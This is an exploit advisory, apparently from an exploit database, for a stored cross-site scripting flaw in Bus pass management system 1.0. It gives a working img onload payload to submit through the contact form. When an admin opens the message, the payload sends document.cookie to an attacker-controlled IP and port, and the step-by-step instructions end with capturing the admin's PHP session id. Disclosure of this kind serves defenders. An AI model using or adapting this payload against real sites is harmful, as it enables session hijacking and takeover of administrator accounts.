Bus pass management system 1.0 stored crosssite scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Bus pass management system 1.0 stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
# Description
The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,
maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.
# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)
- From /contact.php, send a message containing the following payload in "title" or "message" fields:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
(the first url have to be an existing image)
- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php
- Your listener will receive the PHP session id.
Bus pass management system 1.0 stored crosssite scripting (xss)